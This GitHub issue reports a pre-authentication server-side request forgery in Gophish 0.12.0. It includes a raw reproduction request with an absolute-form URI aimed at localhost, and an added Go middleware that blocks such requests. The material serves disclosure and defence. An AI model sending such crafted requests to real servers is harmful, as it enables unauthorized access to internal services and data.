Pre-Auth Full Read SSRF in URI #103

Open
ratel-xx opened this issue Nov 5, 2024 · 0 comments

ratel-xx commented Nov 5, 2024

What version of Gophish are you using?:
0.12.0

Brief description of the issue:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in Gophish that allows attackers to send crafted requests from the vulnerable server. This issue is particularly critical as it does not require prior authentication, enabling the attacker to gain unauthorized access to internal resources and potentially leak sensitive information.

Please provide as many steps as you can to reproduce the problem:

  • Step 1 - Send any request (GET, POST, etc.) with the hostname and protocol added to the request URI.

    GET https://localhost:3333/login HTTP/1.1
    Host: phish-domain.exm.com
    Referer: https://phish-domain.exm.com
    Accept-Encoding: gzip, deflate, br
    Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6,zh;q=0.5
    Connection: keep-alive

  • Step 2 - Full Read SSRF. Expected Malicious Response:
    2

Impact:

  • Unauthorized access to sensitive internal data.
  • Potential pivoting to execute more serious attacks within the network architecture.
  • Identification of and interaction with internal services, which could be leveraged for further attacks.
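
An added example, not part of the original issue and not Gophish's own code: a Go `net/http` middleware that refuses the request shape shown in Step 1, where the request line carries a scheme and host instead of a bare path. The names `rejectAbsoluteForm` and `statusFor` and the two raw requests are constructed for illustration, and it is an assumption that filtering this shape addresses the behaviour reported, since the issue does not identify the root cause.

```go
package main

import (
	"bufio"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed sample requests: the absolute-form target from Step 1 and the
// ordinary origin-form equivalent.
const absoluteForm = "GET https://localhost:3333/login HTTP/1.1\r\nHost: phish-domain.exm.com\r\n\r\n"
const originForm = "GET /login HTTP/1.1\r\nHost: phish-domain.exm.com\r\n\r\n"

// rejectAbsoluteForm (hypothetical name) wraps next and refuses any request
// whose request line named a scheme or host. A server that is not meant to
// act as a forward proxy has no reason to honour a client-chosen destination.
func rejectAbsoluteForm(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		// net/http fills r.URL.Scheme / r.URL.Host only for absolute-form
		// (and authority-form CONNECT) targets; origin-form leaves them empty.
		// For absolute-form it also overwrites r.Host with the URL's host, so
		// checking the Host header alone would not catch this request.
		if r.URL.Scheme != "" || r.URL.Host != "" {
			http.Error(w, "absolute-form request target not accepted", http.StatusBadRequest)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// statusFor parses a raw HTTP/1.1 request the way the server would and
// returns the status code the wrapped handler answers with.
func statusFor(raw string) (int, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return 0, err
	}
	rec := httptest.NewRecorder()
	app := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) })
	rejectAbsoluteForm(app).ServeHTTP(rec, req)
	return rec.Code, nil
}

func main() {
	for _, raw := range []string{absoluteForm, originForm} {
		code, err := statusFor(raw)
		fmt.Println(strings.SplitN(raw, "\r\n", 2)[0], "->", code, err)
	}
}
```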